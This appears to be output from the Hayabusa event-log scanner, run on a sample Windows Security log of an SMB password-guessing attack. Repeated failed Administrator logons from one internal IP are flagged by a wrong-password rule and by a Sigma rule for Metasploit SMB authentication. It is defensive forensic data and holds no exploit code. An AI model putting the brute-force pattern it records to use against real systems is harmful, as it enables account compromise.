14262016-09-20 01:50:14.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14272016-09-20 01:50:14.008 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14282016-09-20 01:50:14.052 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14292016-09-20 01:50:14.052 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14302016-09-20 01:50:14.088 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14312016-09-20 01:50:14.088 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14322016-09-20 01:50:14.124 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14332016-09-20 01:50:14.124 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14342016-09-20 01:50:14.159 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14352016-09-20 01:50:14.159 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14362016-09-20 01:50:14.189 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14372016-09-20 01:50:14.189 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14382016-09-20 01:50:14.228 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14392016-09-20 01:50:14.228 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14402016-09-20 01:50:14.304 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14412016-09-20 01:50:14.304 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14422016-09-20 01:50:14.345 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14432016-09-20 01:50:14.345 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14442016-09-20 01:50:14.389 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14452016-09-20 01:50:14.389 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14462016-09-20 01:50:14.427 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14472016-09-20 01:50:14.427 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14482016-09-20 01:50:14.468 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14492016-09-20 01:50:14.468 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14502016-09-20 01:50:14.503 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14512016-09-20 01:50:14.503 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14522016-09-20 01:50:14.543 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14532016-09-20 01:50:14.543 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14542016-09-20 01:50:14.597 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14552016-09-20 01:50:14.597 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14562016-09-20 01:50:14.637 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14572016-09-20 01:50:14.637 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14582016-09-20 01:50:14.673 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14592016-09-20 01:50:14.673 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14602016-09-20 01:50:14.708 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14612016-09-20 01:50:14.708 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14622016-09-20 01:50:14.748 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14632016-09-20 01:50:14.748 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14642016-09-20 01:50:14.788 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14652016-09-20 01:50:14.788 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14662016-09-20 01:50:14.824 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14672016-09-20 01:50:14.824 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14682016-09-20 01:50:14.868 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14692016-09-20 01:50:14.868 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14702016-09-20 01:50:14.905 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14712016-09-20 01:50:14.905 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14722016-09-20 01:50:14.950 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14732016-09-20 01:50:14.950 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14742016-09-20 01:50:15.004 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14752016-09-20 01:50:15.004 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14762016-09-20 01:50:15.056 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14772016-09-20 01:50:15.056 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14782016-09-20 01:50:15.096 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14792016-09-20 01:50:15.096 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14802016-09-20 01:50:15.128 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14812016-09-20 01:50:15.128 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14822016-09-20 01:50:15.168 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14832016-09-20 01:50:15.168 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14842016-09-20 01:50:15.211 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14852016-09-20 01:50:15.211 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14862016-09-20 01:50:15.254 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14872016-09-20 01:50:15.254 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14882016-09-20 01:50:15.289 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14892016-09-20 01:50:15.289 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14902016-09-20 01:50:15.337 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14912016-09-20 01:50:15.337 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
